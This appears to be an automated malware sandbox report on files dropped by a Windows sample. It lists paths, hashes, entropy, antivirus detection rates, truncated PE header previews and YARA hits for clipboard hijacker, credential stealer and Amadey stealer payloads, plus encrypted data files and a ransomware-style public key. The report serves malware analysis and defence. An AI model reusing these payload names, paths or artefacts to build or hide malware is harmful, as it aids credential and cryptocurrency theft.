                                                                                                                            Preview:2020/.e.V....v...f.....VVm.}.C.tr.g.M.D.LR2........a.:.....~...*.....B.#...z;.F...'u.....>2/.f...........5.3@.5#..J..}...M. ..{.....N..t...<..&].'.h...uk=.l....(..9..~..7+..... c...NIH..cd..e$......:Y..%.^#......p...~...[.]....0.I..Z.s...2...#.qe.J.......:.i\.......+....);5..q.#..L[*..Zu.t..})......d..k.....u`.].gc?..l.?....{G..+|.D..,.m0.....&..[\...3?...M...;.${./.o...@..A.r..Y.C...Ex.=.K..?.!r....{.`....M)..X)..(si<...q'.|....x.>.bL..?u......>.y..[LY6..m.q....!.m{U..Ed....4U40j...pS..$..3..K.L!..R..c.az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):623
                                                                                                                            Entropy (8bit):7.672341084038176
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:cbTqi+zWsjHDRwNRYrQ1QdEY2iZB5i55NTtIAREVFZjFtPixHfzGEGJcii9a:WTqi0WoRw7H1QWY2iFi53TOTbYHyECbD
                                                                                                                            MD5:82E2E3ACA6EC2416013473A6F9BA61B3
                                                                                                                            SHA1:EDEBF86B5B21E938F7B27821893AD52287A056EE
                                                                                                                            SHA-256:767E13A8A8D96090DCA740ED213EFF855A9551F1805DF52676EE490E3E38222E
                                                                                                                            SHA-512:9EECD1FD4EFB3B6BD5B0D56DB9F4B956A87126B61386224B205037339F686B25E0BD6B44E0668E624A63EEB65442E284B221891FEA46C601EFEF729CEBDDC6F5
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:2020/.e.V....v...f.....VVm.}.C.tr.g.M.D.LR2........a.:.....~...*.....B.#...z;.F...'u.....>2/.f...........5.3@.5#..J..}...M. ..{.....N..t...<..&].'.h...uk=.l....(..9..~..7+..... c...NIH..cd..e$......:Y..%.^#......p...~...[.]....0.I..Z.s...2...#.qe.J.......:.i\.......+....);5..q.#..L[*..Zu.t..})......d..k.....u`.].gc?..l.?....{G..+|.D..,.m0.....&..[\...3?...M...;.${./.o...@..A.r..Y.C...Ex.=.K..?.!r....{.`....M)..X)..(si<...q'.|....x.>.bL..?u......>.y..[LY6..m.q....!.m{U..Ed....4U40j...pS..$..3..K.L!..R..c.az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):347
                                                                                                                            Entropy (8bit):7.319964250408128
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:QFHOvH6Q7kO+2ynIhsrj5MUGj3BrbTIUgSBRCn7lbzf6vLcii96Z:QIvHX7VQns45MNPENYRCn7lbzfGcii9a
                                                                                                                            MD5:2F19EB9F2E99DF11E1754AD42CDCC60F
                                                                                                                            SHA1:A1D17DBB19DFBA52F9E034759847808E494D6592
                                                                                                                            SHA-256:8A48D0180CC204273FB8307BD0E26BD9AD27FE1C4FF4250F94F48132EC9F8A67
                                                                                                                            SHA-512:71D2AFAC40AE7D0FCFA7E32A0555DB565D79979C400047BB6E53D0CB9F55DAB8F9D472B70834B27FB624B950A87658B263D924447488189A8F2C6A467120E314
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<root..T..7.........J..]..n0...5.#......i...+b..qZ.c`!O....s...,$I...5h...."...z..n"40o...9....\&.\.k....M)..H.H..s.*.J2.....o.....d>..\..C@.q~....he....(.]....`Y.c..4.s..d.d]_tk....N.....^..B...N..l..2.H..4..+..1B..58.)....2g..O..6....w..e...*..{..az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):347
                                                                                                                            Entropy (8bit):7.319964250408128
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:QFHOvH6Q7kO+2ynIhsrj5MUGj3BrbTIUgSBRCn7lbzf6vLcii96Z:QIvHX7VQns45MNPENYRCn7lbzfGcii9a
                                                                                                                            MD5:2F19EB9F2E99DF11E1754AD42CDCC60F
                                                                                                                            SHA1:A1D17DBB19DFBA52F9E034759847808E494D6592
                                                                                                                            SHA-256:8A48D0180CC204273FB8307BD0E26BD9AD27FE1C4FF4250F94F48132EC9F8A67
                                                                                                                            SHA-512:71D2AFAC40AE7D0FCFA7E32A0555DB565D79979C400047BB6E53D0CB9F55DAB8F9D472B70834B27FB624B950A87658B263D924447488189A8F2C6A467120E314
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<root..T..7.........J..]..n0...5.#......i...+b..qZ.c`!O....s...,$I...5h...."...z..n"40o...9....\&.\.k....M)..H.H..s.*.J2.....o.....d>..\..C@.q~....he....(.]....`Y.c..4.s..d.d]_tk....N.....^..B...N..l..2.H..4..+..1B..58.)....2g..O..6....w..e...*..{..az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):511
                                                                                                                            Entropy (8bit):7.498387653476751
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:Jc1hZK70/56MeSe2ooT+ySA6XAxQks7S+VFabcii9a:J+hg7GgMe9o+ySA6XAWVSIIbbD
                                                                                                                            MD5:29875D8F40B4F270282A9AC12F641A92
                                                                                                                            SHA1:9BF9176FC8E4ABE6FA353268404F0F1F8320AA95
                                                                                                                            SHA-256:57357818E56E5E2F9E33F67CB6DCCDF0BB9887B729C277B7DE6879C284E0CAD7
                                                                                                                            SHA-512:8A14481DABCFF6ABF499EDA63C11FD87213D81A3F4BCD10B967FA8541143C979D3A0F6C6CF941518B4CE4FFB8C4A39D63B5FB6EE79C65D386AF017B9F756D824
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<root..h.R.jE....PX......-h.....O.....(....^....B...A..T...!...i.r.}...y.....u..~..r=.." ...1.Q;..ZoA.Xr(.a.......L.........^.....2...CNC..f.%2.PS`..g.]...L^..6.....6`....=...o..j.0..v.O0.F.:G.H..T\f4t...a.AQ-....8.R*r*...7...."t...g...B|..."1d.f....+.......y..}. .|Dd..1..#xx.*.j.q..8..j..x......I..i.&..?f.../+.0..v.h...[i1..i.....E.....O.UAB..x2..&..?C.NuHw'..a3.u_.c.e..}L.V.<.Y~...l..@....$H.......].TZ..Raz8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):511
                                                                                                                            Entropy (8bit):7.498387653476751
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:Jc1hZK70/56MeSe2ooT+ySA6XAxQks7S+VFabcii9a:J+hg7GgMe9o+ySA6XAWVSIIbbD
                                                                                                                            MD5:29875D8F40B4F270282A9AC12F641A92
                                                                                                                            SHA1:9BF9176FC8E4ABE6FA353268404F0F1F8320AA95
                                                                                                                            SHA-256:57357818E56E5E2F9E33F67CB6DCCDF0BB9887B729C277B7DE6879C284E0CAD7
                                                                                                                            SHA-512:8A14481DABCFF6ABF499EDA63C11FD87213D81A3F4BCD10B967FA8541143C979D3A0F6C6CF941518B4CE4FFB8C4A39D63B5FB6EE79C65D386AF017B9F756D824
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<root..h.R.jE....PX......-h.....O.....(....^....B...A..T...!...i.r.}...y.....u..~..r=.." ...1.Q;..ZoA.Xr(.a.......L.........^.....2...CNC..f.%2.PS`..g.]...L^..6.....6`....=...o..j.0..v.O0.F.:G.H..T\f4t...a.AQ-....8.R*r*...7...."t...g...B|..."1d.f....+.......y..}. .|Dd..1..#xx.*.j.q..8..j..x......I..i.&..?f.../+.0..v.h...[i1..i.....E.....O.UAB..x2..&..?C.NuHw'..a3.u_.c.e..}L.V.<.Y~...l..@....$H.......].TZ..Raz8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):500
                                                                                                                            Entropy (8bit):7.559696518079612
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:Txhl0d2aTdwRNNKyZALykpMYKM3wOel28VXUrbWcii9a:tk4nZSbMY73wOESabD
                                                                                                                            MD5:1C748AAA107E799BD4F898648C953575
                                                                                                                            SHA1:6CDE9B528E5CF7F7710D506EA40B3849DD2D9206
                                                                                                                            SHA-256:16852F3D3B21C912D852A3C6974465F4CCC234D2A6D2ED1087C194408F79347B
                                                                                                                            SHA-512:63CB1331EBC9724A23E3080344117B94D7BAE4CB7F6032A6ADC85EF18461D2164323A542C34B661AB584A3980F4D334921571885BF7ED27DED885E888A7C5F58
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<rootT....XD{..._....4....;..../.}#..?.....>....5n.;?....q...Z)...*....OO..F.a.l...\....32Zmh..y.l..6..w....(.N.fI..^.(.....n..<..*~.E..\.....h..wg...W.....H..D..x..H@..!.(..P.ez...F.R.."r.vrY.Q..q...D..d..,E..6.<!.....,X.9.X`,F7%E.....*.3YA.i,j....F... &.=.....~.Q.i:....Vg....w.\.t......GW..K.j.s..2......C..Y...I...'19...e.MR..g.K.F./r...=........\.A+Xf.dB.X..9D.~!.-.OQ....:.H.Wdv.%...o.be....-]az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):500
                                                                                                                            Entropy (8bit):7.559696518079612
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:Txhl0d2aTdwRNNKyZALykpMYKM3wOel28VXUrbWcii9a:tk4nZSbMY73wOESabD
                                                                                                                            MD5:1C748AAA107E799BD4F898648C953575
                                                                                                                            SHA1:6CDE9B528E5CF7F7710D506EA40B3849DD2D9206
                                                                                                                            SHA-256:16852F3D3B21C912D852A3C6974465F4CCC234D2A6D2ED1087C194408F79347B
                                                                                                                            SHA-512:63CB1331EBC9724A23E3080344117B94D7BAE4CB7F6032A6ADC85EF18461D2164323A542C34B661AB584A3980F4D334921571885BF7ED27DED885E888A7C5F58
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<rootT....XD{..._....4....;..../.}#..?.....>....5n.;?....q...Z)...*....OO..F.a.l...\....32Zmh..y.l..6..w....(.N.fI..^.(.....n..<..*~.E..\.....h..wg...W.....H..D..x..H@..!.(..P.ez...F.R.."r.vrY.Q..q...D..d..,E..6.<!.....,X.9.X`,F7%E.....*.3YA.i,j....F... &.=.....~.Q.i:....Vg....w.\.t......GW..K.j.s..2......C..Y...I...'19...e.MR..g.K.F./r...=........\.A+Xf.dB.X..9D.~!.-.OQ....:.H.Wdv.%...o.be....-]az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):570
                                                                                                                            Entropy (8bit):7.566688643940721
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:RV9t8EXN2KtjYJHVsAeKDD2QHuHdbchc10WfDMKPPw/ucii9a:rP8m/tjYJHVzD2BHLbIWbD
                                                                                                                            MD5:3C4CA7203850061CC6ED41DF3BCFE07D
                                                                                                                            SHA1:BA1160F4BD457E7469307DE35026CC655C36BCBC
                                                                                                                            SHA-256:770F083EDBD9A70E5FE3DF6DF2C913E9381AFA605394452AAC37953AF6B22541
                                                                                                                            SHA-512:4BBD5626498EF2EAF97461CC3842F8C323E2DEEFCEF4BA24EF77F551AEDC13206A9D26EE340BA72C0DEBD65199A507B9D94AE5E8A8C299CB3003E724E1D78EED
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<root&.c...S.r..{.._.b.E.W>..a.>..F.......V$4........N{.O...B&..1.s*4...fl.,..A.hdWel..0....)}....Dh.a...c..`.M.....w..o.t)k.4..[.z.k6..~......@O...........Yy.G....T=.4...........1..K....m.e.y.H.......:...01ag.V.F.0..R.....}.*..5..z.#.8_vy....*.T.......}....."t.4@O>.X.. .dR./(.M.m.=wY.?.!.-...v.'.(.No.q..^.K..,.$..y...P.w...BDAx58...y.@.......aq8-.j.}S]..#..b....`hc..;..$R..f.rxL...k...*j-9.9~Rg.6..I...o...b....._..p.O@..H.r..-^....L....Rp.Uq.B..O|.,Y"5ew...9.az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):570
                                                                                                                            Entropy (8bit):7.566688643940721
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:RV9t8EXN2KtjYJHVsAeKDD2QHuHdbchc10WfDMKPPw/ucii9a:rP8m/tjYJHVzD2BHLbIWbD
                                                                                                                            MD5:3C4CA7203850061CC6ED41DF3BCFE07D
                                                                                                                            SHA1:BA1160F4BD457E7469307DE35026CC655C36BCBC
                                                                                                                            SHA-256:770F083EDBD9A70E5FE3DF6DF2C913E9381AFA605394452AAC37953AF6B22541
                                                                                                                            SHA-512:4BBD5626498EF2EAF97461CC3842F8C323E2DEEFCEF4BA24EF77F551AEDC13206A9D26EE340BA72C0DEBD65199A507B9D94AE5E8A8C299CB3003E724E1D78EED
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<root&.c...S.r..{.._.b.E.W>..a.>..F.......V$4........N{.O...B&..1.s*4...fl.,..A.hdWel..0....)}....Dh.a...c..`.M.....w..o.t)k.4..[.z.k6..~......@O...........Yy.G....T=.4...........1..K....m.e.y.H.......:...01ag.V.F.0..R.....}.*..5..z.#.8_vy....*.T.......}....."t.4@O>.X.. .dR./(.M.m.=wY.?.!.-...v.'.(.No.q..^.K..,.$..y...P.w...BDAx58...y.@.......aq8-.j.}S]..#..b....`hc..;..$R..f.rxL...k...*j-9.9~Rg.6..I...o...b....._..p.O@..H.r..-^....L....Rp.Uq.B..O|.,Y"5ew...9.az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):335360
                                                                                                                            Entropy (8bit):7.226981815045936
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:KYZSitAsJ2xdN5B3TurOnuQdTLOOEPHg:KToAsJ2XNXuStOOuH
                                                                                                                            MD5:B888EFE68F257AA2335ED9CBD63C1343
                                                                                                                            SHA1:C1A97D41D16A7A274802E873CE6B990312B07E03
                                                                                                                            SHA-256:C8B5119160D3301FC69657F1C23C8561E6290B953EC645298F436431D41BBD70
                                                                                                                            SHA-512:7D5BFC95C8F3D5BCC12A4AE1929B4FF946AB3747B29B3AB57B684DECFA78DB4836EC187D8A9ECDA5D2E6C4BAA02989AC1648FB9AAA0E592FB3A70F880529E3A8
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.S.............B?......z9......z.......z.......t4..............z.......z=......z:.....Rich............................PE..L......c.................T....+......w.......p....@...........................,..............................................Y..P.....,.(-..........................................................XC..@............................................text....S.......T.................. ..`.data...lH+..p.......X..............@....rsrc...(-....,.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9728
                                                                                                                            Entropy (8bit):5.3362059272001
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
                                                                                                                            MD5:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                                            SHA1:ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
                                                                                                                            SHA-256:8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
                                                                                                                            SHA-512:AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, Author: unknown
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\3C54.exe
                                                                                                                            File Type:CSV text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):425
                                                                                                                            Entropy (8bit):5.340009400190196
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                                            MD5:CC144808DBAF00E03294347EADC8E779
                                                                                                                            SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                                                            SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                                                            SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):335360
                                                                                                                            Entropy (8bit):7.226981815045936
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:KYZSitAsJ2xdN5B3TurOnuQdTLOOEPHg:KToAsJ2XNXuStOOuH
                                                                                                                            MD5:B888EFE68F257AA2335ED9CBD63C1343
                                                                                                                            SHA1:C1A97D41D16A7A274802E873CE6B990312B07E03
                                                                                                                            SHA-256:C8B5119160D3301FC69657F1C23C8561E6290B953EC645298F436431D41BBD70
                                                                                                                            SHA-512:7D5BFC95C8F3D5BCC12A4AE1929B4FF946AB3747B29B3AB57B684DECFA78DB4836EC187D8A9ECDA5D2E6C4BAA02989AC1648FB9AAA0E592FB3A70F880529E3A8
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.S.............B?......z9......z.......z.......t4..............z.......z=......z:.....Rich............................PE..L......c.................T....+......w.......p....@...........................,..............................................Y..P.....,.(-..........................................................XC..@............................................text....S.......T.................. ..`.data...lH+..p.......X..............@....rsrc...(-....,.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9728
                                                                                                                            Entropy (8bit):5.3362059272001
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
                                                                                                                            MD5:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                                            SHA1:ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
                                                                                                                            SHA-256:8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
                                                                                                                            SHA-512:AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, Author: unknown
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1074176
                                                                                                                            Entropy (8bit):6.478034514486552
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:YVaH8jJPWhQnZzrZ+7xr1rZfVlTxd43v7t5m:2AhQnZzrZSxxZfVlUD
                                                                                                                            MD5:16FD83A682162D6EDC119DC12C9990DC
                                                                                                                            SHA1:4B5F38C78C8E5F1333989DA0912E945335F82C95
                                                                                                                            SHA-256:36BE2F6CCCDF3EDC709E7DABCBE529D4F6390D3C624BA10FB471BD05D36060C8
                                                                                                                            SHA-512:5AF414C95DB738D0A65FDD67F2FF3923C451EE68856237F55626586AAC14EFE62288F5B8D74A5FBF2EABA9E6A1689CEA89B856212A597AB12A3A4B0097E3F3A5
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security
                                                                                                                            • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: kevoreilly
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO..wN..sO..pN..sO..vNe.sO..vN..sO..wN..sO..pN..sO..rN..sO..rOi.sON.zN..sON.sN..sON..O..sON.qN..sORich..sO................PE..d....T.c.........." ................H.....................................................`.........................................`{..X....{..................................h.......p...........................p................................................text............................... ..`.rdata..............................@..@.data....o.......6...|..............@....pdata..............................@..@_RDATA...............J..............@..@.rsrc................L..............@..@.reloc..h............N..............@..B................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):560
                                                                                                                            Entropy (8bit):6.009613601911672
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:YGJ68UiiMLwLR8AFq5I5WhsRtCV64uzR5W:YgJUFfFxg0cV/MI
                                                                                                                            MD5:9252E3DCF847925C8080204C028EBAE6
                                                                                                                            SHA1:498661D45D44EDED195FBB98AEC310D87BF1947E
                                                                                                                            SHA-256:2ED806DEEF0185D3983A46422B07B33CB62FF04873066C7E315876C644B4D4D8
                                                                                                                            SHA-512:71970EFCE4E86B1415696A792DC595F7E9993A587B34D4E000677B8C647A6CDE43845B7E1EBE3EE7F54D0937D2D42B4F8C3ED1C7F4468D2BF8392D57E3A625D3
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzVVm4tu5iyZw13a\/GiU0\\nV5T6yum3k8oXJuPfu\/dlDp5n6Tzk6N8vnuKpjC8lkV7xuMYgdtfQ4cWYKxUvBMa5\\nZoYlzVSlrIVedQM2wz2yOUQcOIoagsxQEzv9Of3rNy2gF4dr82Kp8IaqDk0c3hjz\\nmazDrTR\/jjRhNxY80qI9FZk8pFyou7p\/wowlaHHEiFkCdD2yrZBW1b8jmpuEPqdm\\nH+Nas4N51zRvyqkWCKO68bPnX70ZcR1zLiCfJNxJJ\/wx\/uRwZXCJW3Mhdz+bwMqd\\nhECMff6Chw2XhPIKlGEHGhqCwRLO+yfVnjAF8Tu6hWIg7qhC0tx1sT2u6Xy02NLT\\ntQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc"}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\aafg31.exe
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1440, components 3
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1495756
                                                                                                                            Entropy (8bit):6.930675293414024
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:SMaEt+i3Co+P2EtMd28BWh70vLLvtfSQxMXBcdpOH+BEgkuTun:SIoi/Ete28BNsQxMOpPr8
                                                                                                                            MD5:6DB41995F1C0E3EC9C8F98409B9F159E
                                                                                                                            SHA1:0F6D188A74EB7D36566F76E1A7CE3ADB68C4EB39
                                                                                                                            SHA-256:0329E9CC62E46495BAFCCF5550E10BAD608A7A262160AD4730D8E049377457E0
                                                                                                                            SHA-512:F38AD19CD98B6A8B8158FFDCEF54D53A60F2DE4CE29676DE3592BF9BB6F34E12111504ADD92892E9939439DBB464D54422ABB1905C9961C0628643316DEDAF2A
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
